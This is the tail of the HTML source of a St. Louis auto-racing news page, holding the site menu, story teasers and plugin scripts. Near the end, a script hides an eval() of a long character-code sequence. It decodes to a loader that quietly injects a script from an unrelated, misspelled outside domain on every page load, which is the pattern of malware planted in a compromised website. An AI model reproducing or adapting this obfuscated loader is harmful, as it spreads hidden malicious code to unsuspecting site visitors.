				.td_block_list_menu li.current-menu-ancestor > a,
				.td_block_list_menu li.current-category-ancestor > a{
				    color: #4db2ec;
				}.tdi_99 li{
					display: inline-block;
				
					font-family:Heebo !important;font-size:14px !important;line-height:1.6 !important;font-weight:500 !important;
				}.tdi_99 .menu{
					display: flex;
				}.tdi_99 .sub-menu{
					display: none;
				}.tdi_99 ul{
					margin: 0px;
				
					text-align: center;
					justify-content: center;
				}.tdi_99 ul li{
					margin-right: 18px;
				}.tdi_99 ul li:last-child{
					margin-right: 0;
				}.tdi_99 a{
					color: #777777;
				}body .tdi_99 li.current-menu-item > a,
				body .tdi_99 li.current-menu-ancestor > a,
				body .tdi_99 li.current-category-ancestor > a,
				body .tdi_99 a:hover{
					color: #ffa301;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_99 ul li{
					margin-right: 15px;
				}.tdi_99 ul li:last-child{
					margin-right: 0;
				}.tdi_99 li{
					font-family:Heebo !important;font-size:13px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_99 ul li{
					margin-right: 12px;
				}.tdi_99 ul li:last-child{
					margin-right: 0;
				}.tdi_99 li{
					font-family:Heebo !important;font-size:12px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}

/* phone */
@media (max-width: 767px){
.tdi_99 ul li{
					margin-right: 12px;
				}.tdi_99 ul li:last-child{
					margin-right: 0;
				}.tdi_99 li{
					font-family:Heebo !important;font-size:12px !important;line-height:1.6 !important;font-weight:500 !important;
				}
}
</style><div class="td-block-title-wrap"></div><div id=tdi_99 class="td_block_inner td-fix-index"><div class="menu-main-menu-container"><ul id="menu-main-menu-2" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-30125"><a href="https://www.stlracing.com">HOME</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30128"><a href="https://www.stlracing.com/community">Forums</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30133"><a href="https://www.stlracingphotos.com">Photos</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30135"><a href="https://www.stlracingphotos.com">STLRacingPhotos.com Photos</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30136"><a href="https://www.stlracingphotos.com/Federated-Auto-Parts-Raceway">I-55 Raceway Photos</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30134"><a href="https://www.stlracing.com/gallery">Old User Photos</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31334"><a href="https://www.stlracing.com/classic-photos/tmp-allied-auto-racing-association-classic-photos/">TMP Allied Auto Racing Association Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31336"><a href="https://www.stlracing.com/classic-photos/tmp-belle-clair-speedway-classic-photos/">TMP Belle-Clair Speedway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31337"><a href="https://www.stlracing.com/classic-photos/tmp-godfrey-speedway-classic-photos/">TMP Godfrey Speedway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31340"><a href="https://www.stlracing.com/classic-photos/highland-speedway-classic-photos/">TMP Highland Speedway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31338"><a href="https://www.stlracing.com/classic-photos/tmp-i-55-raceway-classic-photos/">TMP I-55 Raceway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31335"><a href="https://www.stlracing.com/classic-photos/tmp-st-charles-speedway-classic-photos/">TMP St. Charles Speedway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31339"><a href="https://www.stlracing.com/classic-photos/tmp-tri-city-speedway-classic-photos/">TMP Tri-City Speedway Classic Photos</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31341"><a href="https://www.stlracing.com/classic-photos/tri-city-speedway-classic-photos-1/">Tri-City Speedway Classic Photos</a></li>
	</ul>
</li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30137"><a href="https://www.stlracing.com/directory">Racing Links</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-has-children menu-item-30138"><a href="https://www.stlracing.com/directory/links_category/drivers-race-teams/">Drivers Websites</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30169"><a href="https://www.stlracing.com/directory/links_category/late-model-drivers/">Late Model Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30170"><a href="https://www.stlracing.com/directory/links_category/sprint-car-drivers/">Sprint Car Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30171"><a href="https://www.stlracing.com/directory/links_category/modified-drivers/">Modified Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30233"><a href="https://www.stlracing.com/directory/links_category/northeast-modified-drivers/">Northeast Modified Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30172"><a href="https://www.stlracing.com/directory/links_category/midget-drivers/">Midget Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30174"><a href="https://www.stlracing.com/directory/links_category/micro-sprint-drivers/">Micro Sprint Drivers</a></li>
		<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30173"><a href="https://www.stlracing.com/directory/links_category/stock-car-drivers/">Stock Car Drivers</a></li>
	</ul>
</li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30139"><a href="https://www.stlracing.com/directory/links_category/racing-sanctioning-organizations/">Sanctioning Bodies</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30145"><a href="http://www.stlracing.com/events/">Events</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-36284"><a href="https://www.stlracing.com/category/driver-profiles/">Driver Profiles</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36348"><a href="https://www.stlracing.com/submit-driver-profile/">Submit Driver Profile</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-36285"><a href="https://www.stlracing.com/category/driver-profiles/2016-driver-profiles/">2016 Driver Profiles</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36606"><a href="https://www.stlracing.com/driver-profiles/late-models/">Late Models</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36605"><a href="https://www.stlracing.com/driver-profiles/modifieds-b-modifieds/">Modifieds – B-Modifieds</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36602"><a href="https://www.stlracing.com/driver-profiles/sprints-midgets-micros/">Sprints – Midgets – Micros</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36604"><a href="https://www.stlracing.com/driver-profiles/stock-cars-sportsman/">Stock Cars – Sportsman</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36603"><a href="https://www.stlracing.com/driver-profiles/sport-compacts/">Sport Compacts</a></li>
	</ul>
</li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31280"><a href="https://www.stlracing.com/facebook-feeds/">Facebook Feeds</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31286"><a href="https://www.stlracing.com/facebook-feeds/tracks-facebook-feed/">Tracks Facebook Feeds</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31281"><a href="https://www.stlracing.com/facebook-feeds/series-facebook-feeds/">Series Facebook Feeds</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30146"><a href="https://www.stlracing.com/community/index.php?forums/classified-ads.110/">Classifieds</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30147"><a href="https://www.stlracing.com/advertise.html">Advertise</a></li>
</ul></div></div></div></div></div></div></div></div></div>        </div>

    </div>
    
</div><!--close td-outer-wrap-->


<script async>(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='21c920e8efcca381741208624ea5d939b258273e04c3bf028012b2f9b4a7a8fc';j.dataset.sumoPlatform='wordpress';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumo.com/');</script>    <script type="application/javascript">
      var ajaxurl = "https://www.stlracing.com/wp-admin/admin-ajax.php";

      function sumo_add_woocommerce_coupon(code) {
        jQuery.post(ajaxurl, {
          action: 'sumo_add_woocommerce_coupon',
          code: code,
        });
      }

      function sumo_remove_woocommerce_coupon(code) {
        jQuery.post(ajaxurl, {
          action: 'sumo_remove_woocommerce_coupon',
          code: code,
        });
      }

      function sumo_get_woocommerce_cart_subtotal(callback) {
        jQuery.ajax({
          method: 'POST',
          url: ajaxurl,
          dataType: 'html',
          data: {
            action: 'sumo_get_woocommerce_cart_subtotal',
          },
          success: function(subtotal) {
            return callback(null, subtotal);
          },
          error: function(err) {
            return callback(err, 0);
          }
        });
      }
    </script>
                    <div class="td-more-articles-box">
                    <i class="td-icon-close td-close-more-articles-box"></i>
                    <span class="td-more-articles-box-title">MORE STORIES</span>
                    <div class="td-content-more-articles-box">

                    
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" class="td-image-wrap " title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph" ><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC" alt="" title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph" data-type="image_tag" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/Cory-Hedgecock-112622-Chad-Wells-image.jpg?resize=324%2C160&ssl=1"  width="324" height="160" /></a></div>                            </div>
            <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/cory-hedgecock-ends-2022-campaign-with-leftover-5000-triumph/" rel="bookmark" title="Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph">Cory Hedgecock Ends 2022 Campaign with Leftover $5,000 Triumph</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:43:12-06:00" >November 28, 2022</time></span>                            </div>

            
        </div>

        
        <div class="td_module_1 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" class="td-image-wrap " title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" ><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUQAAACgAQMAAABOhoelAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAAB1JREFUWMPtwTEBAAAAwiD7p/ZdCGAAAAAAAAAQBxpAAAH8le3bAAAAAElFTkSuQmCC" alt="" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director" data-type="image_tag" data-img-url="https://i0.wp.com/www.stlracing.com/wp-content/uploads/2022/11/XOM_TylerBachman_byJacyNorgaard.jpg?resize=324%2C160&ssl=1"  width="324" height="160" /></a></div>                            </div>
            <h3 class="entry-title td-module-title"><a href="https://www.stlracing.com/2022/11/28/xtreme-outlaw-midget-series-welcomes-bachman-as-director/" rel="bookmark" title="Xtreme Outlaw Midget Series Welcomes Bachman as Director">Xtreme Outlaw Midget Series Welcomes Bachman as Director</a></h3>
            <div class="td-module-meta-info">
                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-28T10:14:04-06:00" >November 28, 2022</time></span>                            </div>

            
        </div>

                            </div>
                </div>

    <!--

        Theme: Newspaper by tagDiv.com 2022
        Version: 12.1.1 (rara)
        Deploy mode: deploy
        
        uid: 638660ac62544
    -->

    <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));</script><script type='text/javascript' src='https://c0.wp.com/p/jetpack/11.5.1/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script>
<script type='text/javascript' id='tptn_tracker-js-extra'>
/* <![CDATA[ */
var ajax_tptn_tracker = {"ajax_url":"https:\/\/www.stlracing.com\/wp-admin\/admin-ajax.php","top_ten_id":"72666","top_ten_blog_id":"1","activate_counter":"11","top_ten_debug":"0","tptn_rnd":"1322079651"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/top-10/includes/js/top-10-tracker.min.js?ver=3.2.1' id='tptn_tracker-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/underscore.min.js' id='underscore-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=87b3292f51aec51c00e6ce7db9b73ed1' id='tdb_js_posts_autoload-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.1.1' id='td-site-min-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/6.1.1/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/intersection-observer.js?minify=false&#038;ver=83ec8aa758f883d6da14' id='jetpack-lazy-images-polyfill-intersectionobserver-js'></script>
<script type='text/javascript' id='jetpack-lazy-images-js-extra'>
/* <![CDATA[ */
var jetpackLazyImagesL10n = {"loading_warning":"Images are still loading. Please cancel your print and try again."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-lazy-images/dist/lazy-images.js?minify=false&#038;ver=8767d0da914b289bd862' id='jetpack-lazy-images-js'></script>
<script type='text/javascript' src='https://www.stlracing.com/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=87b3292f51aec51c00e6ce7db9b73ed1' id='tdb_js_files_for_front-js'></script>

<!-- JS generated by theme -->

<script>
    

            
                jQuery().ready(function () {

                    var blockClass = '.tdi_10';

                    jQuery(blockClass + '.tdb-horiz-menu-singleline > .menu-item-has-children a').click(function (e) {
                        e.preventDefault();
                    })

                });
            
            

            
                /* global jQuery:{} */
                jQuery(window).on( 'load', function () {

                    var tdbMenuItem = new tdbMenu.item();
                    tdbMenuItem.blockUid = 'tdi_32';
                    tdbMenuItem.jqueryObj = jQuery('.tdi_32');

	                
	                
                    tdbMenuItem.isMegaMenuParentPos = true;

	                
	                
                    tdbMenu.addItem(tdbMenuItem);

                });
            
            
</script>

	<script src='https://stats.wp.com/e-202248.js' defer></script>
	<script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'61074336',post:'72666',tz:'-6',srv:'www.stlracing.com',j:'1:11.5.1'} ]);
		_stq.push([ 'clickTrackerInit', '61074336', '72666' ]);
	</script>
</body>
</html>
<!-- Dynamic page generated in 2.129 seconds. -->
<!-- Cached page generated by WP-Super-Cache on 2022-11-29 13:42:36 -->

<!-- Compression = gzip -->